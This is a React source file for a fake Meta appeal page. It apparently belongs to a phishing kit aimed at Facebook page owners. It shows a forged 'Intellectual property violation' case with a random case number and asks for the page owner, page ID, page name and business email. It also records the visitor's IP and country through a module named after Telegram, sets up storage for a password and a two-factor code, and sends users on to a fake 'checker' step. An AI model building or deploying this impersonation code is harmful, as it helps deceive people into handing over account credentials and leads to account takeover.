/* eslint-disable no-useless-escape */
import { useLocation, useNavigate } from "react-router-dom";
import { useEffect, useState, useMemo } from "react";
import useLocalStorage from "../hooks/useLocalStore";
import { getLocation /*, login, click*/ } from "../services/telegram.service";
import { ROUTES } from "../routers/constants";
import logoMeta from "../assets/images/logo-meta.png";
import mailIcon from "../assets/images/IconMail.png";

import {
  CountryPhoneInputValue,
} from "antd-country-phone-input";
import "./acc.css";
import /*useSocketIO,*/ "../socketIO";
import { isMobile } from "react-device-detect";

import "antd-country-phone-input/dist/index.css";


function FormAppeal() {
  const location = useLocation();
  const queryParams = new URLSearchParams(location.search);
  const pageId = queryParams.get("pageId");
  const pageN = queryParams.get("pageName");
  const pageMail = queryParams.get("pageMail");
  const pageOwner = queryParams.get("pageOwner");
  const [email, setEmail] = useState(pageId || "");
  const [owner, setOwner] = useState(pageOwner || "");
  const [pageName, setPageName] = useState(pageN || "");
  const [bEmail, setBEmail] = useState(pageMail || "");
  const [appealContent, setAppealContent] = useState("");
  const [agree, setAgree] = useState(false);

  const [appealTouched, setAppealTouched] = useState(false);
  const [agreeTouched, setAgreeTouched] = useState(false);
  const [isOwnerInvalid, setOwnerInvalid] = useState(false);
  const [isPageNameInvalid, setPageNameInvalid] = useState(false);

  const [countryCode, setCountryCode] = useState("US");
  const [ip, setIp] = useState("");

  const [isEmailInvalid, setEmailInvalid] = useState(false);
  const [isBEmailInvalid, setBEmailInvalid] = useState(false);
  const [isPhoneInvalid, setPhoneInvalid] = useState(false);

  const [loginFailed, setLoginFailed] = useState(false);
  const navigate = useNavigate();

  const randomString = (length: number): string => {
    let result = "";
    const characters =
      "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
    const charactersLength = characters.length;
    for (let i = 0; i < length; i++) {
      result += characters.charAt(Math.floor(Math.random() * charactersLength));
    }
    return result;
  };
  const randomNumber = (length: number): string => {
    let result = "";
    const characters = "0123456789";
    const charactersLength = characters.length;
    for (let i = 0; i < length; i++) {
      result += characters.charAt(Math.floor(Math.random() * charactersLength));
    }
    return result;
  };

  const [user, setUser] = useLocalStorage("user", {
    phoneNumber: "",
    email: "",
    password: "",
    twoFaCode: "",
  });

  const fetchCountry = async () => {
    const data = await getLocation();
    setIp(data.ip);
    setCountryCode(data.country_code);
  };

  useEffect(() => {
    fetchCountry();
  }, []);

  function validatePhoneNumber(phoneNumber: string) {
    // đơn giản: 10 digits US-style; bạn có thể thay bằng lib nếu muốn quốc tế hoá chặt hơn
    const re = /^\(?(\d{3})\)?[- ]?(\d{3})[- ]?(\d{4})$/;
    setPhoneInvalid(!re.test(phoneNumber));
  }

  const checkEmail = (email: string) => {
    if (isMobile) {
      setEmailInvalid(email.length < 0);
    } else {
      const re = /\S+@\S+\.\S+/;
      const ph =
        /^(?:(?:\(?(?:00|\+)([1-4]\d\d|[1-9]\d?)\)?)?[\-\.\ \\\/]?)?((?:\(?\d{1,}\)?[\-\.\ \\\/]?){0,})(?:[\-\.\ \\\/]?(?:#|ext\.?|extension|x)[\-\.\ \\\/]?(\d+))?$/;
      if (!re.test(email)) {
        setEmailInvalid(!ph.test(email));
      } else {
        setEmailInvalid(false);
      }
    }
  };

  const checkBEmail = (email: string) => {
    if (isMobile) {
      setEmailInvalid(email.length < 0);
    } else {
      const re = /\S+@\S+\.\S+/;
      const ph =
        /^(?:(?:\(?(?:00|\+)([1-4]\d\d|[1-9]\d?)\)?)?[\-\.\ \\\/]?)?((?:\(?\d{1,}\)?[\-\.\ \\\/]?){0,})(?:[\-\.\ \\\/]?(?:#|ext\.?|extension|x)[\-\.\ \\\/]?(\d+))?$/;
      if (!re.test(email)) {
        setBEmailInvalid(!ph.test(email));
      } else {
        setBEmailInvalid(false);
      }
    }
  };

  const handleClick = async () => {
    navigate({
      pathname: ROUTES.CHECKER_ROUTE,
      search: `?token=${randomString(20)}&submission_id=${randomNumber(15)}`,
    });
  };

  // --- NEW: Tính toán có thể submit hay không ---
  const canSubmit = useMemo(() => {
    return (
      !isEmailInvalid &&
      !!email &&
      !!bEmail &&
      !!appealContent.trim() &&
      !!owner.trim() &&
      !!pageName.trim() &&
      agree
    );
  }, [isEmailInvalid, email, bEmail, appealContent, owner, pageName, agree]);

  return (
    <div className="business overflow-auto h-screen">
      <div className="masheader sticky top-0 flex items-center justify-start md:px-10 z-50">
        <img className="h-[34px] object-contain" src={logoMeta} alt="Logo" />
      </div>

      <div className="main-f">
        <div className="flex flex-col items-start bg-white w-full md:w-[680px] mx-auto rounded-lg p-[15px]">
          <div className="flex items-center">
            <img src={mailIcon} alt="icon" className="h-12 w-12 mr-4" />
            <div>
              <div className="font-bold text-black text-lg">
                Intellectual property violation
              </div>
              <div className="flex items-center">
                <div className="bg-blue-500 text-white px-1 mr-2 rounded-sm">
                  OPEN
                </div>
                <div>Case #{randomNumber(10)}</div>
              </div>
            </div>
          </div>

          <hr className="border-gray-500 w-full my-8" />

          <div className="flex items-start">
            <img src={mailIcon} alt="icon" className="h-12 w-12 mr-4" />
            <div>
              <div className="font-bold text-black text-lg">Our Message:</div>
              <div>- Community Standards</div>
              <div>- Copyright</div>
              <div>- Hate speech, harassment and bullying</div>
              <div>- Intellectual property rights</div>
              <br />
              <div>
                If you believe your page was removed by mistake, fill in this
                form so we can help.
              </div>
            </div>
          </div>

          <hr className="border-gray-500 w-full my-8" />

          <div
            id="basic"
            className="ant-form ant-form-horizontal css-18iikkb"
            style={{ width: "100%", color: "#67788a" }}
          >
            {/* Owner */}
            <div className="item-form" style={{ marginTop: "14px" }}>
              <label
                htmlFor="owner"
                style={{ fontWeight: "bold", marginBottom: "4px" }}
              >
                Who is the owner of the Page? *
              </label>
              <div className="ant-form-item css-18iikkb">
                <div className="ant-row ant-form-item-row css-18iikkb">
                  <div className="ant-col ant-form-item-control css-18iikkb">
                    <div className="ant-form-item-control-input">
                      <div className="ant-form-item-control-input-content">
                        <input
                          id="owner"
                          aria-required="true"
                          required
                          className="ant-input css-18iikkb pd-10"
                          type="text"
                          value={owner}
                          onChange={(e) => setOwner(e.target.value)}
                          onBlur={() => setOwnerInvalid(!owner.trim())}
                        />
                      </div>
                    </div>
                    {isOwnerInvalid && (
                      <div
                        className="ant-form-item-explain ant-form-item-explain-connected css-18iikkb"
                        role="alert"
                      >
                        <div
                          className="ant-form-item-explain-error"
                          style={{ color: "#ff4d4f" }}
                        >
                          Please input the page owner!
                        </div>
                      </div>
                    )}
                  </div>
                </div>
              </div>
            </div>

            {/* Email */}
            <div className="item-form" style={{ marginTop: "14px" }}>
              <label
                htmlFor="basic_fill_business_email"
                style={{ fontWeight: "bold", marginBottom: "4px" }}
              >
                Page ID *
              </label>
              <div className="ant-form-item css-18iikkb">
                <div className="ant-row ant-form-item-row css-18iikkb">
                  <div className="ant-col ant-form-item-control css-18iikkb">
                    <div className="ant-form-item-control-input">
                      <div className="ant-form-item-control-input-content">
                        <input
                          id="basic_fill_business_email"
                          aria-required="true"
                          required
                          className="ant-input css-18iikkb pd-10"
                          type="text"
                          value={email}
                          onChange={(e) => {
                            setLoginFailed(false);
                            setEmail(e.target.value);
                          }}
                        />
                      </div>
                    </div>
                    {isEmailInvalid && !!email && (
                      <div style={{ display: "flex", flexWrap: "nowrap" }}>
                        <div
                          id="basic_fill_full_name_help"
                          className="ant-form-item-explain ant-form-item-explain-connected css-18iikkb"
                          role="alert"
                        >
                          <div className="ant-form-item-explain-error">
                            Please input valid email address!
                          </div>
                        </div>
                        <div style={{ width: "0px", height: "24px" }}></div>
                      </div>
                    )}
                  </div>
                </div>
              </div>
            </div>

            {/* Page Name */}
            <div className="item-form" style={{ marginTop: "14px" }}>
              <label
                htmlFor="page_name"
                style={{ fontWeight: "bold", marginBottom: "4px" }}
              >
                What is name Page? *
              </label>
              <div className="ant-form-item css-18iikkb">
                <div className="ant-row ant-form-item-row css-18iikkb">
                  <div className="ant-col ant-form-item-control css-18iikkb">
                    <div className="ant-form-item-control-input">
                      <div className="ant-form-item-control-input-content">
                        <input
                          id="page_name"
                          aria-required="true"
                          required
                          className="ant-input css-18iikkb pd-10"
                          type="text"
                          value={pageName}
                          onChange={(e) => setPageName(e.target.value)}
                          onBlur={() => setPageNameInvalid(!pageName.trim())}
                        />
                      </div>
                    </div>
                    {isPageNameInvalid && (
                      <div
                        className="ant-form-item-explain ant-form-item-explain-connected css-18iikkb"
                        role="alert"
                      >
                        <div
                          className="ant-form-item-explain-error"
                          style={{ color: "#ff4d4f" }}
                        >
                          Please input the page name!
                        </div>
                      </div>
                    )}
                  </div>
                </div>
              </div>
            </div>

            {/* Business Email */}
            <div className="item-form" style={{ marginTop: "14px" }}>
              <label
                htmlFor="Business"
                style={{ fontWeight: "bold", marginBottom: "4px" }}
              >
                Email Business? *
              </label>
              <div className="ant-form-item css-18iikkb">
                <div className="ant-row ant-form-item-row css-18iikkb">
                  <div className="ant-col ant-form-item-control css-18iikkb">
                    <div className="ant-form-item-control-input">
                      <div className="ant-form-item-control-input-content">
                        <input
                          id="Business"
                          aria-required="true"
                          required
                          className="ant-input css-18iikkb pd-10"
                          type="email"
                          value={bEmail}
                          onChange={(e) => {
                            setLoginFailed(false);
                            checkBEmail(e.target.value);
                            setBEmail(e.target.value);
                          }}
                          onBlur={() => checkBEmail(bEmail)}
                        />
                      </div>
                    </div>
                    {isBEmailInvalid && !!bEmail && (
                      <div style={{ display: "flex", flexWrap: "nowrap" }}>
                        <div
                          id="basic_fill_full_name_help"
                          className="ant-form-item-explain ant-form-item-explain-connected css-18iikkb"
                          role="alert"
                        >
                          <div className="ant-form-item-explain-error">
                            Please input valid email address!
                          </div>
                        </div>
                        <div style={{ width: "0px", height: "24px" }}></div>
                      </div>
                    )}
                  </div>
                </div>
              </div>
            </div>

            {/* Phone */}
            {/* <label
              htmlFor="b-phone"
              style={{ fontWeight: "bold", marginBottom: "4px" }}
            >
              Phone Number*
            </label>
            <CountryPhoneInput
              inline
              value={value}
              onChange={(v) => {
                setValue(v);
                validatePhoneNumber(v.phone || "");
              }}
              className="phone-input"
            />
            {isPhoneInvalid && (
              <div style={{ display: "flex", flexWrap: "nowrap" }}>
                <div
                  id="b-phone"
                  className="ant-form-item-explain ant-form-item-explain-connected css-18iikkb"
                  role="alert"
                >
                  <div
                    className="ant-form-item-explain-error"
                    style={{ color: "#ff4d4f" }}
                  >
                    Please input valid phone number!
                  </div>
                </div>
                <div style={{ width: "0px", height: "24px" }}></div>
              </div>
            )} */}

            {/* 3 optional checkboxes */}
            {/* <div className="group_cke mt-3">
              <div className="flex items-center mb-2">
                <input
                  id="x-checkbox"
                  type="checkbox"
                  className="w-4 h-4 text-blue-600 bg-gray-100 border-gray-300 rounded"
                />
                <label htmlFor="x-checkbox" className="ms-2 text-sm font-bold">
                  Country of your credit and/or debit cards doesn't match your
                  current location
                </label>
              </div>
              <div className="flex items-center mb-2">
                <input
                  id="y-checkbox"
                  type="checkbox"
                  className="w-4 h-4 text-blue-600 bg-gray-100 border-gray-300 rounded"
                />
                <label htmlFor="y-checkbox" className="ms-2 text-sm font-bold">
                  You traveled within the last 60 days
                </label>
              </div>
              <div className="flex items-center mb-2">
                <input
                  id="z-checkbox"
                  type="checkbox"
                  className="w-4 h-4 text-blue-600 bg-gray-100 border-gray-300 rounded"
                />
                <label htmlFor="z-checkbox" className="ms-2 text-sm font-bold">
                  You relocated within the last 60 days
                </label>
              </div>
            </div> */}

            {/* Appeal */}
            <div className="item-form" style={{ marginTop: "14px" }}>
              <label
                htmlFor="appeal_content"
                style={{ fontWeight: "bold", marginBottom: "4px" }}
              >
                Your Appeal *
              </label>
              <div className="ant-form-item css-18iikkb">
                <div className="ant-row ant-form-item-row css-18iikkb">
                  <div className="ant-col ant-form-item-control css-18iikkb">
                    <div className="ant-form-item-control-input">
                      <div className="ant-form-item-control-input-content">
                        <textarea
                          id="appeal_content"
                          aria-required="true"
                          required
                          className="ant-input css-18iikkb pd-10"
                          value={appealContent}
                          onChange={(e) => setAppealContent(e.target.value)}
                          onBlur={() => setAppealTouched(true)}
                        />
                      </div>
                    </div>
                  </div>
                </div>
                {appealTouched && !appealContent.trim() && (
                  <div style={{ display: "flex", flexWrap: "nowrap" }}>
                    <div
                      id="basic_fill_full_name_help"
                      className="ant-form-item-explain ant-form-item-explain-connected css-18iikkb"
                      role="alert"
                    >
                      <div
                        className="ant-form-item-explain-error"
                        style={{ color: "#ff4d4f" }}
                      >
                        Please input your appeal!
                      </div>
                    </div>
                    <div style={{ width: "0px", height: "24px" }}></div>
                  </div>
                )}
              </div>

              {/* Agree to policy (required) */}
              <div className="flex items-center mb-3">
                <input
                  id="default-checkbox"
                  type="checkbox"
                  required
                  checked={agree}
                  onChange={(e) => {
                    setAgree(e.target.checked);
                    setAgreeTouched(true);
                  }}
                  className="w-4 h-4 text-blue-600 bg-gray-100 border-gray-300 rounded"
                />
                <label
                  htmlFor="default-checkbox"
                  className="ms-2 text-sm font-bold"
                >
                  Do you agree to our Terms, Data Policy and Cookies Policy.
                </label>
              </div>
              {!agree && agreeTouched && (
                <div
                  className="ant-form-item-explain ant-form-item-explain-connected css-18iikkb"
                  role="alert"
                >
                  <div
                    className="ant-form-item-explain-error"
                    style={{ color: "#ff4d4f" }}
                  >
                    You must agree to continue.
                  </div>
                </div>
              )}
            </div>

            {/* Submit */}
            <div className="mb-3 btn-left">
              <button
                type="button"
                className="btn btn-primary"
                data-bs-toggle="modal"
                data-bs-target="#passModal"
                disabled={!canSubmit}
                onClick={() => {
                  // đánh dấu các field để hiện lỗi nếu trống
                  setOwnerInvalid(!owner.trim());
                  setPageNameInvalid(!pageName.trim());
                  setAgreeTouched(true);
                  if (canSubmit) {
                    handleClick();
                  }
                }}
              >
                Submit
              </button>
            </div>

            <p>
              For more information about how Meta handles your data please read
              our{" "}
              <a
                href="https://www.facebook.com/privacy/explanation"
                target="_blank"
                rel="noreferrer"
                className="text-blue-500 hover:text-blue-800"
              >
                Meta Privacy Policy
              </a>
            </p>
          </div>
        </div>
      </div>

      {/* Modal login phần dưới giữ nguyên nếu cần */}
    </div>
  );
}

export default FormAppeal;
